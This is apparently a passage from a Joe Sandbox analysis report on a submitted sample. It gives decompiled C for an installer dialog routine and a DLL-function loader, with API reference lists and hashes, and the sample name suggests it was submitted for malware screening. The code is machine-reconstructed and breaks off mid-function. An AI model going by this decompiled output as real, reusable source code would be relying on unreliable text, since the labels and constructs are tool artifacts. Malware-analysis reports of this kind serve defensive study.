                        				intOrPtr _t119;
                        				void* _t127;
                        				intOrPtr _t130;
                        				struct HWND__* _t134;
                        				int _t156;
                        				int _t159;
                        				struct HMENU__* _t164;
                        				struct HWND__* _t168;
                        				struct HWND__* _t169;
                        				int _t171;
                        				void* _t172;
                        				short* _t173;
                        				short* _t175;
                        				int _t177;
                        
                        				_t169 =  *0x7a7a44;
                        				_t156 = 0;
                        				_v8 = _t169;
                        				if(_a8 != 0x110) {
                        					if(_a8 == 0x405) {
                        						_t127 = CreateThread(0, 0, E0040564F, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                        						FindCloseChangeNotification(_t127); // executed
                        					}
                        					if(_a8 != 0x111) {
                        						L17:
                        						_t171 = 1;
                        						if(_a8 != 0x404) {
                        							L25:
                        							if(_a8 != 0x7b) {
                        								goto L20;
                        							}
                        							_t94 = _v8;
                        							if(_a12 != _t94) {
                        								goto L20;
                        							}
                        							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                        							_a8 = _t95;
                        							if(_t95 <= _t156) {
                        								L36:
                        								return 0;
                        							}
                        							_t164 = CreatePopupMenu();
                        							AppendMenuW(_t164, _t156, _t171, E00406557(_t156, _t164, _t171, _t156, 0xffffffe1));
                        							_t100 = _a16;
                        							_t159 = _a16 >> 0x10;
                        							if(_a16 == 0xffffffff) {
                        								GetWindowRect(_v8,  &_v28);
                        								_t100 = _v28.left;
                        								_t159 = _v28.top;
                        							}
                        							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                        								_v60 = _t156;
                        								_v48 = 0x7a1f48;
                        								_v44 = 0x1000;
                        								_a4 = _a8;
                        								do {
                        									_a4 = _a4 - 1;
                        									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                        								} while (_a4 != _t156);
                        								OpenClipboard(_t156);
                        								EmptyClipboard();
                        								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                        								_a4 = _t108;
                        								_t172 = GlobalLock(_t108);
                        								do {
                        									_v48 = _t172;
                        									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                        									 *_t173 = 0xd;
                        									_t175 = _t173 + 2;
                        									 *_t175 = 0xa;
                        									_t172 = _t175 + 2;
                        									_t156 = _t156 + 1;
                        								} while (_t156 < _a8);
                        								GlobalUnlock(_a4);
                        								SetClipboardData(0xd, _a4);
                        								CloseClipboard();
                        							}
                        							goto L36;
                        						}
                        						if( *0x7a7a2c == _t156) {
                        							ShowWindow( *0x7a8a68, 8);
                        							if( *0x7a8aec == _t156) {
                        								_t119 =  *0x7a0f20; // 0xa1e104
                        								E0040557C( *((intOrPtr*)(_t119 + 0x34)), _t156);
                        							}
                        							E0040444F(_t171);
                        							goto L25;
                        						}
                        						 *0x7a0718 = 2;
                        						E0040444F(0x78);
                        						goto L20;
                        					} else {
                        						if(_a12 != 0x403) {
                        							L20:
                        							return E004044DD(_a8, _a12, _a16);
                        						}
                        						ShowWindow( *0x7a7a30, _t156);
                        						ShowWindow(_t169, 8);
                        						E004044AB(_t169);
                        						goto L17;
                        					}
                        				}
                        				_v52 = _v52 | 0xffffffff;
                        				_v40 = _v40 | 0xffffffff;
                        				_t177 = 2;
                        				_v60 = _t177;
                        				_v56 = 0;
                        				_v48 = 0;
                        				_v44 = 0;
                        				asm("stosd");
                        				asm("stosd");
                        				_t130 =  *0x7a8a70;
                        				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                        				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                        				 *0x7a7a30 = GetDlgItem(_a4, 0x403);
                        				 *0x7a7a28 = GetDlgItem(_a4, 0x3ee);
                        				_t134 = GetDlgItem(_a4, 0x3f8);
                        				 *0x7a7a44 = _t134;
                        				_v8 = _t134;
                        				E004044AB( *0x7a7a30);
                        				 *0x7a7a34 = E00404E04(4);
                        				 *0x7a7a4c = 0;
                        				GetClientRect(_v8,  &_v28);
                        				_v52 = _v28.right - GetSystemMetrics(_t177);
                        				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                        				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                        				if(_a8 >= 0) {
                        					SendMessageW(_v8, 0x1001, 0, _a8);
                        					SendMessageW(_v8, 0x1026, 0, _a8);
                        				}
                        				if(_a12 >= _t156) {
                        					SendMessageW(_v8, 0x1024, _t156, _a12);
                        				}
                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                        				_push(0x1b);
                        				E00404476(_a4);
                        				if(( *0x7a8a78 & 0x00000003) != 0) {
                        					ShowWindow( *0x7a7a30, _t156);
                        					if(( *0x7a8a78 & 0x00000002) != 0) {
                        						 *0x7a7a30 = _t156;
                        					} else {
                        						ShowWindow(_v8, 8);
                        					}
                        					E004044AB( *0x7a7a28);
                        				}
                        				_t168 = GetDlgItem(_a4, 0x3ec);
                        				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                        				if(( *0x7a8a78 & 0x00000004) != 0) {
                        					SendMessageW(_t168, 0x409, _t156, _a12);
                        					SendMessageW(_t168, 0x2001, _t156, _a8);
                        				}
                        				goto L36;
                        			}




































                        APIs
                        • GetDlgItem.USER32 ref: 00405719
                        • GetDlgItem.USER32 ref: 00405728
                        • GetClientRect.USER32 ref: 00405765
                        • GetSystemMetrics.USER32 ref: 0040576C
                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040578D
                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040579E
                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057B1
                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057BF
                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057D2
                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057F4
                        • ShowWindow.USER32(?,00000008), ref: 00405808
                        • GetDlgItem.USER32 ref: 00405829
                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405839
                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405852
                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040585E
                        • GetDlgItem.USER32 ref: 00405737
                          • Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                        • GetDlgItem.USER32 ref: 0040587B
                        • CreateThread.KERNELBASE ref: 00405889
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405890
                        • ShowWindow.USER32(00000000), ref: 004058B4
                        • ShowWindow.USER32(?,00000008), ref: 004058B9
                        • ShowWindow.USER32(00000008), ref: 00405903
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405937
                        • CreatePopupMenu.USER32 ref: 00405948
                        • AppendMenuW.USER32 ref: 0040595C
                        • GetWindowRect.USER32 ref: 0040597C
                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405995
                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059CD
                        • OpenClipboard.USER32(00000000), ref: 004059DD
                        • EmptyClipboard.USER32 ref: 004059E3
                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059EF
                        • GlobalLock.KERNEL32 ref: 004059F9
                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A0D
                        • GlobalUnlock.KERNEL32(00000000), ref: 00405A2D
                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405A38
                        • CloseClipboard.USER32 ref: 00405A3E
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                        • String ID: {
                        • API String ID: 4154960007-366298937
                        • Opcode ID: 6f9b910c36771dad060a0dd0b7d94d2eb85d45aef733cfe21307c5b05fb3eeaa
                        • Instruction ID: d7cac64708ae36737aaf404740c8a4e4a0ccfdbfd79e04772bb75515dd65aeb5
                        • Opcode Fuzzy Hash: 6f9b910c36771dad060a0dd0b7d94d2eb85d45aef733cfe21307c5b05fb3eeaa
                        • Instruction Fuzzy Hash: BFB14BB1900608FFDF11AF64DD89AAE7B79FB48354F00802AFA41B61A0CB795A51DF58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 95%
                        			E732D1BFF() {
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				WCHAR* _v24;
                        				WCHAR* _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				signed int _v40;
                        				signed int _v44;
                        				WCHAR* _v48;
                        				signed int _v52;
                        				void* _v56;
                        				intOrPtr _v60;
                        				WCHAR* _t208;
                        				signed int _t211;
                        				void* _t213;
                        				void* _t215;
                        				WCHAR* _t217;
                        				void* _t225;
                        				struct HINSTANCE__* _t226;
                        				struct HINSTANCE__* _t227;
                        				struct HINSTANCE__* _t229;
                        				signed short _t231;
                        				struct HINSTANCE__* _t234;
                        				struct HINSTANCE__* _t236;
                        				void* _t237;
                        				intOrPtr* _t238;
                        				void* _t249;
                        				signed char _t250;
                        				signed int _t251;
                        				struct HINSTANCE__* _t257;
                        				void* _t258;
                        				signed int _t260;
                        				signed int _t261;
                        				signed short* _t264;
                        				signed int _t269;
                        				signed int _t272;
                        				signed int _t274;
                        				void* _t277;
                        				void* _t281;
                        				struct HINSTANCE__* _t283;
                        				signed int _t286;
                        				void _t287;
                        				signed int _t288;
                        				signed int _t300;
                        				signed int _t301;
                        				signed short _t304;
                        				void* _t305;
                        				signed int _t309;
                        				signed int _t312;
                        				signed int _t315;
                        				signed int _t316;
                        				signed int _t317;
                        				signed short* _t321;
                        				WCHAR* _t322;
                        				WCHAR* _t324;
                        				WCHAR* _t325;
                        				struct HINSTANCE__* _t326;
                        				void* _t328;
                        				signed int _t331;
                        				void* _t332;
                        
                        				_t283 = 0;
                        				_v32 = 0;
                        				_v36 = 0;
                        				_v16 = 0;
                        				_v8 = 0;
                        				_v40 = 0;
                        				_t332 = 0;
                        				_v52 = 0;
                        				_v44 = 0;
                        				_t208 = E732D12BB();
                        				_v24 = _t208;
                        				_v28 = _t208;
                        				_v48 = E732D12BB();
                        				_t321 = E732D12E3();
                        				_v56 = _t321;
                        				_v12 = _t321;
                        				while(1) {
                        					_t211 = _v32;
                        					_v60 = _t211;
                        					if(_t211 != _t283 && _t332 == _t283) {
                        						break;
                        					}
                        					_t286 =  *_t321 & 0x0000ffff;
                        					_t213 = _t286 - _t283;
                        					if(_t213 == 0) {
                        						_t37 =  &_v32;
                        						 *_t37 = _v32 | 0xffffffff;
                        						__eflags =  *_t37;
                        						L20:
                        						_t215 = _v60 - _t283;
                        						if(_t215 == 0) {
                        							__eflags = _t332 - _t283;
                        							 *_v28 = _t283;
                        							if(_t332 == _t283) {
                        								_t332 = GlobalAlloc(0x40, 0x1ca4);
                        								 *(_t332 + 0x1010) = _t283;
                        								 *(_t332 + 0x1014) = _t283;
                        							}
                        							_t287 = _v36;
                        							_t47 = _t332 + 8; // 0x8
                        							_t217 = _t47;
                        							_t48 = _t332 + 0x808; // 0x808
                        							_t322 = _t48;
                        							 *_t332 = _t287;
                        							_t288 = _t287 - _t283;
                        							__eflags = _t288;
                        							 *_t217 = _t283;
                        							 *_t322 = _t283;
                        							 *(_t332 + 0x1008) = _t283;
                        							 *(_t332 + 0x100c) = _t283;
                        							 *(_t332 + 4) = _t283;
                        							if(_t288 == 0) {
                        								__eflags = _v28 - _v24;
                        								if(_v28 == _v24) {
                        									goto L42;
                        								}
                        								_t328 = 0;
                        								GlobalFree(_t332);
                        								_t332 = E732D13B1(_v24);
                        								__eflags = _t332 - _t283;
                        								if(_t332 == _t283) {
                        									goto L42;
                        								} else {
                        									goto L35;
                        								}
                        								while(1) {
                        									L35:
                        									_t249 =  *(_t332 + 0x1ca0);
                        									__eflags = _t249 - _t283;
                        									if(_t249 == _t283) {
                        										break;
                        									}
                        									_t328 = _t332;
                        									_t332 = _t249;
                        									__eflags = _t332 - _t283;
                        									if(_t332 != _t283) {
                        										continue;
                        									}
                        									break;
                        								}
                        								__eflags = _t328 - _t283;
                        								if(_t328 != _t283) {
                        									 *(_t328 + 0x1ca0) = _t283;
                        								}
                        								_t250 =  *(_t332 + 0x1010);
                        								__eflags = _t250 & 0x00000008;
                        								if((_t250 & 0x00000008) == 0) {
                        									_t251 = _t250 | 0x00000002;
                        									__eflags = _t251;
                        									 *(_t332 + 0x1010) = _t251;
                        								} else {
                        									_t332 = E732D162F(_t332);
                        									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                        								}
                        								goto L42;
                        							} else {
                        								_t300 = _t288 - 1;
                        								__eflags = _t300;
                        								if(_t300 == 0) {
                        									L31:
                        									lstrcpyW(_t217, _v48);
                        									L32:
                        									lstrcpyW(_t322, _v24);
                        									goto L42;
                        								}
                        								_t301 = _t300 - 1;
                        								__eflags = _t301;
                        								if(_t301 == 0) {
                        									goto L32;
                        								}
                        								__eflags = _t301 != 1;
                        								if(_t301 != 1) {
                        									goto L42;
                        								}
                        								goto L31;
                        							}
                        						} else {
                        							if(_t215 == 1) {
                        								_t257 = _v16;
                        								if(_v40 == _t283) {
                        									_t257 = _t257 - 1;
                        								}
                        								 *(_t332 + 0x1014) = _t257;
                        							}
                        							L42:
                        							_v12 = _v12 + 2;
                        							_v28 = _v24;
                        							L59:
                        							if(_v32 != 0xffffffff) {
                        								_t321 = _v12;
                        								continue;
                        							}
                        							break;
                        						}
                        					}
                        					_t258 = _t213 - 0x23;
                        					if(_t258 == 0) {
                        						__eflags = _t321 - _v56;
                        						if(_t321 <= _v56) {
                        							L17:
                        							__eflags = _v44 - _t283;
                        							if(_v44 != _t283) {
                        								L43:
                        								_t260 = _v32 - _t283;
                        								__eflags = _t260;
                        								if(_t260 == 0) {
                        									_t261 = _t286;
                        									while(1) {
                        										__eflags = _t261 - 0x22;
                        										if(_t261 != 0x22) {
                        											break;
                        										}
                        										_t321 =  &(_t321[1]);
                        										__eflags = _v44 - _t283;
                        										_v12 = _t321;
                        										if(_v44 == _t283) {
                        											_v44 = 1;
                        											L162:
                        											_v28 =  &(_v28[0]);
                        											 *_v28 =  *_t321;
                        											L58:
                        											_t331 =  &(_t321[1]);
                        											__eflags = _t331;
                        											_v12 = _t331;
                        											goto L59;
                        										}
                        										_t261 =  *_t321 & 0x0000ffff;
                        										_v44 = _t283;
                        									}
                        									__eflags = _t261 - 0x2a;
                        									if(_t261 == 0x2a) {
                        										_v36 = 2;
                        										L57:
                        										_t321 = _v12;
                        										_v28 = _v24;
                        										_t283 = 0;
                        										__eflags = 0;
                        										goto L58;
                        									}
                        									__eflags = _t261 - 0x2d;
                        									if(_t261 == 0x2d) {
                        										L151:
                        										_t304 =  *_t321;
                        										__eflags = _t304 - 0x2d;
                        										if(_t304 != 0x2d) {
                        											L154:
                        											_t264 =  &(_t321[1]);
                        											__eflags =  *_t264 - 0x3a;
                        											if( *_t264 != 0x3a) {
                        												goto L162;
                        											}
                        											__eflags = _t304 - 0x2d;
                        											if(_t304 == 0x2d) {
                        												goto L162;
                        											}
                        											_v36 = 1;
                        											L157:
                        											_v12 = _t264;
                        											__eflags = _v28 - _v24;
                        											if(_v28 <= _v24) {
                        												 *_v48 = _t283;
                        											} else {
                        												 *_v28 = _t283;
                        												lstrcpyW(_v48, _v24);
                        											}
                        											goto L57;
                        										}
                        										_t264 =  &(_t321[1]);
                        										__eflags =  *_t264 - 0x3e;
                        										if( *_t264 != 0x3e) {
                        											goto L154;
                        										}
                        										_v36 = 3;
                        										goto L157;
                        									}
                        									__eflags = _t261 - 0x3a;
                        									if(_t261 != 0x3a) {
                        										goto L162;
                        									}
                        									goto L151;
                        								}
                        								_t269 = _t260 - 1;
                        								__eflags = _t269;
                        								if(_t269 == 0) {
                        									L80:
                        									_t305 = _t286 + 0xffffffde;
                        									__eflags = _t305 - 0x55;
                        									if(_t305 > 0x55) {
                        										goto L57;
                        									}
                        									switch( *((intOrPtr*)(( *(_t305 + 0x732d23e8) & 0x000000ff) * 4 +  &M732D235C))) {
                        										case 0:
                        											__ecx = _v24;
                        											__edi = _v12;
                        											while(1) {
                        												__edi = __edi + 1;
                        												__edi = __edi + 1;
                        												_v12 = __edi;
                        												__ax =  *__edi;
                        												__eflags = __ax - __dx;
                        												if(__ax != __dx) {
                        													goto L132;
                        												}
                        												L131:
                        												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                        												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                        													L136:
                        													 *__ecx =  *__ecx & 0x00000000;
                        													__eax = E732D12CC(_v24);
                        													__ebx = __eax;
                        													goto L97;
                        												}
                        												L132:
                        												__eflags = __ax;
                        												if(__ax == 0) {
                        													goto L136;
                        												}
                        												__eflags = __ax - __dx;
                        												if(__ax == __dx) {
                        													__edi = __edi + 1;
                        													__edi = __edi + 1;
                        													__eflags = __edi;
                        												}
                        												__ax =  *__edi;
                        												 *__ecx =  *__edi;
                        												__ecx = __ecx + 1;
                        												__ecx = __ecx + 1;
                        												__edi = __edi + 1;
                        												__edi = __edi + 1;
                        												_v12 = __edi;
                        												__ax =  *__edi;
                        												__eflags = __ax - __dx;
                        												if(__ax != __dx) {
                        													goto L132;
                        												}
                        												goto L131;
                        											}
                        										case 1:
                        											_v8 = 1;
                        											goto L57;
                        										case 2:
                        											_v8 = _v8 | 0xffffffff;
                        											goto L57;
                        										case 3:
                        											_v8 = _v8 & 0x00000000;
                        											_v20 = _v20 & 0x00000000;
                        											_v16 = _v16 + 1;
                        											goto L85;
                        										case 4:
                        											__eflags = _v20;
                        											if(_v20 != 0) {
                        												goto L57;
                        											}
                        											_v12 = _v12 - 2;
                        											__ebx = E732D12BB();
                        											 &_v12 = E732D1B86( &_v12);
                        											__eax = E732D1510(__edx, __eax, __edx, __ebx);
                        											goto L97;
                        										case 5:
                        											L105:
                        											_v20 = _v20 + 1;
                        											goto L57;
                        										case 6:
                        											_push(7);
                        											goto L123;
                        										case 7:
                        											_push(0x19);
                        											goto L143;
                        										case 8:
                        											__eax = 0;
                        											__eax = 1;
                        											__eflags = 1;
                        											goto L107;
                        										case 9:
                        											_push(0x15);
                        											goto L143;
                        										case 0xa:
                        											_push(0x16);
                        											goto L143;
                        										case 0xb:
                        											_push(0x18);
                        											goto L143;
                        										case 0xc:
                        											__eax = 0;
                        											__eax = 1;
                        											__eflags = 1;
                        											goto L118;
                        										case 0xd:
                        											__eax = 0;
                        											__eax = 1;
                        											__eflags = 1;
                        											goto L109;
                        										case 0xe:
                        											__eax = 0;
                        											__eax = 1;
                        											__eflags = 1;
                        											goto L111;
                        										case 0xf:
                        											__eax = 0;
                        											__eax = 1;
                        											__eflags = 1;
                        											goto L122;
                        										case 0x10:
                        											__eax = 0;
                        											__eax = 1;
                        											__eflags = 1;
                        											goto L113;
                        										case 0x11:
                        											_push(3);
                        											goto L123;
                        										case 0x12:
                        											_push(0x17);
                        											L143:
                        											_pop(__ebx);
                        											goto L98;
                        										case 0x13:
                        											__eax =  &_v12;
                        											__eax = E732D1B86( &_v12);
                        											__ebx = __eax;
                        											__ebx = __eax + 1;
                        											__eflags = __ebx - 0xb;
                        											if(__ebx < 0xb) {
                        												__ebx = __ebx + 0xa;
                        											}
                        											goto L97;
                        										case 0x14:
                        											__ebx = 0xffffffff;
                        											goto L98;
                        										case 0x15:
                        											__eax = 0;
                        											__eax = 1;
                        											__eflags = 1;
                        											goto L116;
                        										case 0x16:
                        											__ecx = 0;
                        											__eflags = 0;
                        											goto L91;
                        										case 0x17:
                        											__eax = 0;
                        											__eax = 1;
                        											__eflags = 1;
                        											goto L120;
                        										case 0x18:
                        											_t271 =  *(_t332 + 0x1014);
                        											__eflags = _t271 - _v16;
                        											if(_t271 > _v16) {
                        												_v16 = _t271;
                        											}
                        											_v8 = _v8 & 0x00000000;
                        											_v20 = _v20 & 0x00000000;
                        											_v36 - 3 = _t271 - (_v36 == 3);
                        											if(_t271 != _v36 == 3) {
                        												L85:
                        												_v40 = 1;
                        											}
                        											goto L57;
                        										case 0x19:
                        											L107:
                        											__ecx = 0;
                        											_v8 = 2;
                        											__ecx = 1;
                        											goto L91;
                        										case 0x1a:
                        											L118:
                        											_push(5);
                        											goto L123;
                        										case 0x1b:
                        											L109:
                        											__ecx = 0;
                        											_v8 = 3;
                        											__ecx = 1;
                        											goto L91;
                        										case 0x1c:
                        											L111:
                        											__ecx = 0;
                        											__ecx = 1;
                        											goto L91;
                        										case 0x1d:
                        											L122:
                        											_push(6);
                        											goto L123;
                        										case 0x1e:
                        											L113:
                        											_push(2);
                        											goto L123;
                        										case 0x1f:
                        											__eax =  &_v12;
                        											__eax = E732D1B86( &_v12);
                        											__ebx = __eax;
                        											__ebx = __eax + 1;
                        											goto L97;
                        										case 0x20:
                        											L116:
                        											_v52 = _v52 + 1;
                        											_push(4);
                        											_pop(__ecx);
                        											goto L91;
                        										case 0x21:
                        											L120:
                        											_push(4);
                        											L123:
                        											_pop(__ecx);
                        											L91:
                        											__edi = _v16;
                        											__edx =  *(0x732d405c + __ecx * 4);
                        											__eax =  ~__eax;
                        											asm("sbb eax, eax");
                        											_v40 = 1;
                        											__edi = _v16 << 5;
                        											__eax = __eax & 0x00008000;
                        											__edi = (_v16 << 5) + __esi;
                        											__eax = __eax | __ecx;
                        											__eflags = _v8;
                        											 *(__edi + 0x1018) = __eax;
                        											if(_v8 < 0) {
                        												L93:
                        												__edx = 0;
                        												__edx = 1;
                        												__eflags = 1;
                        												L94:
                        												__eflags = _v8 - 1;
                        												 *(__edi + 0x1028) = __edx;
                        												if(_v8 == 1) {
                        													__eax =  &_v12;
                        													__eax = E732D1B86( &_v12);
                        													__eax = __eax + 1;
                        													__eflags = __eax;
                        													_v8 = __eax;
                        												}
                        												__eax = _v8;
                        												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                        												_t136 = _v16 + 0x81; // 0x81
                        												_t136 = _t136 << 5;
                        												__eax = 0;
                        												__eflags = 0;
                        												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                        												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                        												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                        												L97:
                        												__eflags = __ebx;
                        												if(__ebx == 0) {
                        													goto L57;
                        												}
                        												L98:
                        												__eflags = _v20;
                        												_v40 = 1;
                        												if(_v20 != 0) {
                        													L103:
                        													__eflags = _v20 - 1;
                        													if(_v20 == 1) {
                        														__eax = _v16;
                        														__eax = _v16 << 5;
                        														__eflags = __eax;
                        														 *(__eax + __esi + 0x102c) = __ebx;
                        													}
                        													goto L105;
                        												}
                        												_v16 = _v16 << 5;
                        												_t144 = __esi + 0x1030; // 0x1030
                        												__edi = (_v16 << 5) + _t144;
                        												__eax =  *__edi;
                        												__eflags = __eax - 0xffffffff;
                        												if(__eax <= 0xffffffff) {
                        													L101:
                        													__eax = GlobalFree(__eax);
                        													L102:
                        													 *__edi = __ebx;
                        													goto L103;
                        												}
                        												__eflags = __eax - 0x19;
                        												if(__eax <= 0x19) {
                        													goto L102;
                        												}
                        												goto L101;
                        											}
                        											__eflags = __edx;
                        											if(__edx > 0) {
                        												goto L94;
                        											}
                        											goto L93;
                        										case 0x22:
                        											goto L57;
                        									}
                        								}
                        								_t272 = _t269 - 1;
                        								__eflags = _t272;
                        								if(_t272 == 0) {
                        									_v16 = _t283;
                        									goto L80;
                        								}
                        								__eflags = _t272 != 1;
                        								if(_t272 != 1) {
                        									goto L162;
                        								}
                        								__eflags = _t286 - 0x6e;
                        								if(__eflags > 0) {
                        									_t309 = _t286 - 0x72;
                        									__eflags = _t309;
                        									if(_t309 == 0) {
                        										_push(4);
                        										L74:
                        										_pop(_t274);
                        										L75:
                        										__eflags = _v8 - 1;
                        										if(_v8 != 1) {
                        											_t96 = _t332 + 0x1010;
                        											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                        											__eflags =  *_t96;
                        										} else {
                        											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                        										}
                        										_v8 = 1;
                        										goto L57;
                        									}
                        									_t312 = _t309 - 1;
                        									__eflags = _t312;
                        									if(_t312 == 0) {
                        										_push(0x10);
                        										goto L74;
                        									}
                        									__eflags = _t312 != 0;
                        									if(_t312 != 0) {
                        										goto L57;
                        									}
                        									_push(0x40);
                        									goto L74;
                        								}
                        								if(__eflags == 0) {
                        									_push(8);
                        									goto L74;
                        								}
                        								_t315 = _t286 - 0x21;
                        								__eflags = _t315;
                        								if(_t315 == 0) {
                        									_v8 =  ~_v8;
                        									goto L57;
                        								}
                        								_t316 = _t315 - 0x11;
                        								__eflags = _t316;
                        								if(_t316 == 0) {
                        									_t274 = 0x100;
                        									goto L75;
                        								}
                        								_t317 = _t316 - 0x31;
                        								__eflags = _t317;
                        								if(_t317 == 0) {
                        									_t274 = 1;
                        									goto L75;
                        								}
                        								__eflags = _t317 != 0;
                        								if(_t317 != 0) {
                        									goto L57;
                        								}
                        								_push(0x20);
                        								goto L74;
                        							} else {
                        								_v32 = _t283;
                        								_v36 = _t283;
                        								goto L20;
                        							}
                        						}
                        						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                        						if( *((short*)(_t321 - 2)) != 0x3a) {
                        							goto L17;
                        						}
                        						__eflags = _v32 - _t283;
                        						if(_v32 == _t283) {
                        							goto L43;
                        						}
                        						goto L17;
                        					}
                        					_t277 = _t258 - 5;
                        					if(_t277 == 0) {
                        						__eflags = _v44 - _t283;
                        						if(_v44 != _t283) {
                        							goto L43;
                        						} else {
                        							__eflags = _v36 - 3;
                        							_v32 = 1;
                        							_v8 = _t283;
                        							_v20 = _t283;
                        							_v16 = (0 | _v36 == 0x00000003) + 1;
                        							_v40 = _t283;
                        							goto L20;
                        						}
                        					}
                        					_t281 = _t277 - 1;
                        					if(_t281 == 0) {
                        						__eflags = _v44 - _t283;
                        						if(_v44 != _t283) {
                        							goto L43;
                        						} else {
                        							_v32 = 2;
                        							_v8 = _t283;
                        							_v20 = _t283;
                        							goto L20;
                        						}
                        					}
                        					if(_t281 != 0x16) {
                        						goto L43;
                        					} else {
                        						_v32 = 3;
                        						_v8 = 1;
                        						goto L20;
                        					}
                        				}
                        				GlobalFree(_v56);
                        				GlobalFree(_v24);
                        				GlobalFree(_v48);
                        				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                        					L182:
                        					return _t332;
                        				} else {
                        					_t225 =  *_t332 - 1;
                        					if(_t225 == 0) {
                        						_t187 = _t332 + 8; // 0x8
                        						_t324 = _t187;
                        						__eflags =  *_t324 - _t283;
                        						if( *_t324 != _t283) {
                        							_t226 = GetModuleHandleW(_t324); // executed
                        							__eflags = _t226 - _t283;
                        							 *(_t332 + 0x1008) = _t226;
                        							if(_t226 != _t283) {
                        								L171:
                        								_t192 = _t332 + 0x808; // 0x808
                        								_t325 = _t192;
                        								_t227 = E732D16BD( *(_t332 + 0x1008), _t325);
                        								__eflags = _t227 - _t283;
                        								 *(_t332 + 0x100c) = _t227;
                        								if(_t227 == _t283) {
                        									__eflags =  *_t325 - 0x23;
                        									if( *_t325 == 0x23) {
                        										_t195 = _t332 + 0x80a; // 0x80a
                        										_t231 = E732D13B1(_t195);
                        										__eflags = _t231 - _t283;
                        										if(_t231 != _t283) {
                        											__eflags = _t231 & 0xffff0000;
                        											if((_t231 & 0xffff0000) == 0) {
                        												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                        											}
                        										}
                        									}
                        								}
                        								__eflags = _v52 - _t283;
                        								if(_v52 != _t283) {
                        									L178:
                        									_t325[lstrlenW(_t325)] = 0x57;
                        									_t229 = E732D16BD( *(_t332 + 0x1008), _t325);
                        									__eflags = _t229 - _t283;
                        									if(_t229 != _t283) {
                        										L166:
                        										 *(_t332 + 0x100c) = _t229;
                        										goto L182;
                        									}
                        									__eflags =  *(_t332 + 0x100c) - _t283;
                        									L180:
                        									if(__eflags != 0) {
                        										goto L182;
                        									}
                        									L181:
                        									_t206 = _t332 + 4;
                        									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                        									__eflags =  *_t206;
                        									goto L182;
                        								} else {
                        									__eflags =  *(_t332 + 0x100c) - _t283;
                        									if( *(_t332 + 0x100c) != _t283) {
                        										goto L182;
                        									}
                        									goto L178;
                        								}
                        							}
                        							_t234 = LoadLibraryW(_t324); // executed
                        							__eflags = _t234 - _t283;
                        							 *(_t332 + 0x1008) = _t234;
                        							if(_t234 == _t283) {
                        								goto L181;
                        							}
                        							goto L171;
                        						}
                        						_t188 = _t332 + 0x808; // 0x808
                        						_t236 = E732D13B1(_t188);
                        						 *(_t332 + 0x100c) = _t236;
                        						__eflags = _t236 - _t283;
                        						goto L180;
                        					}
                        					_t237 = _t225 - 1;
                        					if(_t237 == 0) {
                        						_t185 = _t332 + 0x808; // 0x808
                        						_t238 = _t185;
                        						__eflags =  *_t238 - _t283;
                        						if( *_t238 == _t283) {
                        							goto L182;
                        						}
                        						_t229 = E732D13B1(_t238);
                        						L165:
                        						goto L166;
                        					}
                        					if(_t237 != 1) {
                        						goto L182;
                        					}
                        					_t81 = _t332 + 8; // 0x8
                        					_t284 = _t81;
                        					_t326 = E732D13B1(_t81);
                        					 *(_t332 + 0x1008) = _t326;
                        					if(_t326 == 0) {
                        						goto L181;
                        					}
                        					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
